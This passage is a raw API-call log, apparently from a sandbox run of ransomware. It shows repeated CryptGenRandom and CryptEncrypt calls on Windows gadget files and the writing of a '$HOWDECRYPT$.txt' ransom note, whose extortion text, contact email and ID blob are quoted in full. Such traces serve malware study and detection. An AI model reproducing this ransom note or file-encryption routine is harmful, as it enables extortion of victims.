returned 1 [0160.712] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e948 | out: pbBuffer=0x57e948) returned 1 [0160.712] GetProcessHeap () returned 0x2c0000 [0160.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.712] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e940*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e940*=0x30) returned 1 [0160.712] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_few-showers.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_few-showers.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.726] GetProcessHeap () returned 0x2c0000 [0160.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.726] GetProcessHeap () returned 0x2c0000 [0160.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3e998 | out: hHeap=0x2c0000) returned 1 [0160.726] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e940 | out: pbBuffer=0x57e940) returned 1 [0160.727] GetProcessHeap () returned 0x2c0000 [0160.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.727] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e938*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e938*=0x30) returned 1 [0160.727] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_up.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_up.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.733] GetProcessHeap () returned 0x2c0000 [0160.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.733] GetProcessHeap () returned 0x2c0000 [0160.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f43f28 | out: hHeap=0x2c0000) returned 1 [0160.733] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e940 | out: pbBuffer=0x57e940) returned 1 [0160.733] GetProcessHeap () returned 0x2c0000 [0160.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.733] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e938*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e938*=0x30) returned 1 [0160.733] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\activity16v.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\activity16v.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.742] GetProcessHeap () returned 0x2c0000 [0160.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.742] GetProcessHeap () returned 0x2c0000 [0160.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f43c28 | out: hHeap=0x2c0000) returned 1 [0160.742] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e938 | out: pbBuffer=0x57e938) returned 1 [0160.742] GetProcessHeap () returned 0x2c0000 [0160.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.742] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e930*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e930*=0x30) returned 1 [0160.742] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\5.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\5.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.776] GetProcessHeap () returned 0x2c0000 [0160.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.776] GetProcessHeap () returned 0x2c0000 [0160.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeeec0 | out: hHeap=0x2c0000) returned 1 [0160.777] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e938 | out: pbBuffer=0x57e938) returned 1 [0160.777] GetProcessHeap () returned 0x2c0000 [0160.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.777] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e930*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e930*=0x30) returned 1 [0160.777] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\40.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\40.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.783] GetProcessHeap () returned 0x2c0000 [0160.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.783] GetProcessHeap () returned 0x2c0000 [0160.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee780 | out: hHeap=0x2c0000) returned 1 [0160.783] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e930 | out: pbBuffer=0x57e930) returned 1 [0160.783] GetProcessHeap () returned 0x2c0000 [0160.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.783] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e928*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e928*=0x30) returned 1 [0160.784] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\33.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\33.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.789] GetProcessHeap () returned 0x2c0000 [0160.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.789] GetProcessHeap () returned 0x2c0000 [0160.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee040 | out: hHeap=0x2c0000) returned 1 [0160.789] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e930 | out: pbBuffer=0x57e930) returned 1 [0160.789] GetProcessHeap () returned 0x2c0000 [0160.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.789] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e928*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e928*=0x30) returned 1 [0160.789] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\27.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\27.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.793] GetProcessHeap () returned 0x2c0000 [0160.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.793] GetProcessHeap () returned 0x2c0000 [0160.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed9e8 | out: hHeap=0x2c0000) returned 1 [0160.793] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e928 | out: pbBuffer=0x57e928) returned 1 [0160.793] GetProcessHeap () returned 0x2c0000 [0160.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.793] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e920*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e920*=0x30) returned 1 [0160.793] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\23.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\23.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.796] GetProcessHeap () returned 0x2c0000 [0160.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.797] GetProcessHeap () returned 0x2c0000 [0160.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed648 | out: hHeap=0x2c0000) returned 1 [0160.797] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e928 | out: pbBuffer=0x57e928) returned 1 [0160.797] GetProcessHeap () returned 0x2c0000 [0160.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.797] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e920*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e920*=0x30) returned 1 [0160.797] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\2.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\2.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.797] GetProcessHeap () returned 0x2c0000 [0160.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.797] GetProcessHeap () returned 0x2c0000 [0160.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed2a8 | out: hHeap=0x2c0000) returned 1 [0160.797] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e920 | out: pbBuffer=0x57e920) returned 1 [0160.797] GetProcessHeap () returned 0x2c0000 [0160.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.797] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e918*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e918*=0x30) returned 1 [0160.797] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1px.gif" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\1px.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.805] GetProcessHeap () returned 0x2c0000 [0160.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.805] GetProcessHeap () returned 0x2c0000 [0160.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8ac18 | out: hHeap=0x2c0000) returned 1 [0160.805] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e920 | out: pbBuffer=0x57e920) returned 1 [0160.805] GetProcessHeap () returned 0x2c0000 [0160.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.805] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e918*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e918*=0x30) returned 1 [0160.805] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)notConnectedStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)notconnectedstateicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.805] GetProcessHeap () returned 0x2c0000 [0160.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.805] GetProcessHeap () returned 0x2c0000 [0160.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e26eb0 | out: hHeap=0x2c0000) returned 1 [0160.805] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e918 | out: pbBuffer=0x57e918) returned 1 [0160.805] GetProcessHeap () returned 0x2c0000 [0160.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.805] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e910*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e910*=0x30) returned 1 [0160.806] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)greenStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)greenstateicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.809] GetProcessHeap () returned 0x2c0000 [0160.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.809] GetProcessHeap () returned 0x2c0000 [0160.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c83c60 | out: hHeap=0x2c0000) returned 1 [0160.809] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.811] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.811] WriteFile (in: hFile=0x178, lpBuffer=0x57e84b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e974, lpOverlapped=0x0 | out: lpBuffer=0x57e84b*, lpNumberOfBytesWritten=0x57e974*=0x127, lpOverlapped=0x0) returned 1 [0160.811] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.811] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e974, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e974*=0x2ac, lpOverlapped=0x0) returned 1 [0160.812] CloseHandle (hObject=0x178) returned 1 [0160.812] GetProcessHeap () returned 0x2c0000 [0160.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3e1f0 | out: hHeap=0x2c0000) returned 1 [0160.812] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e910 | out: pbBuffer=0x57e910) returned 1 [0160.812] GetProcessHeap () returned 0x2c0000 [0160.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.812] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e908*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e908*=0x30) returned 1 [0160.812] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)redStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)redstateicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.819] GetProcessHeap () returned 0x2c0000 [0160.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.820] GetProcessHeap () returned 0x2c0000 [0160.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c83a10 | out: hHeap=0x2c0000) returned 1 [0160.820] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e910 | out: pbBuffer=0x57e910) returned 1 [0160.820] GetProcessHeap () returned 0x2c0000 [0160.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.820] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e908*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e908*=0x30) returned 1 [0160.820] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\11.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\11.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.824] GetProcessHeap () returned 0x2c0000 [0160.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.825] GetProcessHeap () returned 0x2c0000 [0160.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeca80 | out: hHeap=0x2c0000) returned 1 [0160.825] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e908 | out: pbBuffer=0x57e908) returned 1 [0160.825] GetProcessHeap () returned 0x2c0000 [0160.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.825] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e900*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e900*=0x30) returned 1 [0160.825] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\settings.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\settings.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.836] GetProcessHeap () returned 0x2c0000 [0160.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.836] GetProcessHeap () returned 0x2c0000 [0160.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f38970 | out: hHeap=0x2c0000) returned 1 [0160.836] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e908 | out: pbBuffer=0x57e908) returned 1 [0160.836] GetProcessHeap () returned 0x2c0000 [0160.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.836] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e900*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e900*=0x30) returned 1 [0160.836] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\weather.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\weather.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.842] GetProcessHeap () returned 0x2c0000 [0160.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.847] GetProcessHeap () returned 0x2c0000 [0160.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f38878 | out: hHeap=0x2c0000) returned 1 [0160.848] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e900 | out: pbBuffer=0x57e900) returned 1 [0160.848] GetProcessHeap () returned 0x2c0000 [0160.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.848] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e8f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e8f8*=0x30) returned 1 [0160.849] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\logo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.875] GetProcessHeap () returned 0x2c0000 [0160.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.876] GetProcessHeap () returned 0x2c0000 [0160.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eec7c8 | out: hHeap=0x2c0000) returned 1 [0160.876] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e900 | out: pbBuffer=0x57e900) returned 1 [0160.876] GetProcessHeap () returned 0x2c0000 [0160.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.876] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e8f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e8f8*=0x30) returned 1 [0160.876] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_hov.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_hov.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.881] GetProcessHeap () returned 0x2c0000 [0160.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.881] GetProcessHeap () returned 0x2c0000 [0160.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f43628 | out: hHeap=0x2c0000) returned 1 [0160.881] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e8f8 | out: pbBuffer=0x57e8f8) returned 1 [0160.881] GetProcessHeap () returned 0x2c0000 [0160.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.882] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e8f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e8f0*=0x30) returned 1 [0160.882] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_hov.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_hov.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.901] GetProcessHeap () returned 0x2c0000 [0160.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.901] GetProcessHeap () returned 0x2c0000 [0160.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3c658 | out: hHeap=0x2c0000) returned 1 [0160.902] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e8f8 | out: pbBuffer=0x57e8f8) returned 1 [0160.902] GetProcessHeap () returned 0x2c0000 [0160.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.902] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e8f0*=0x20, dwBufLen=0x30 | out: 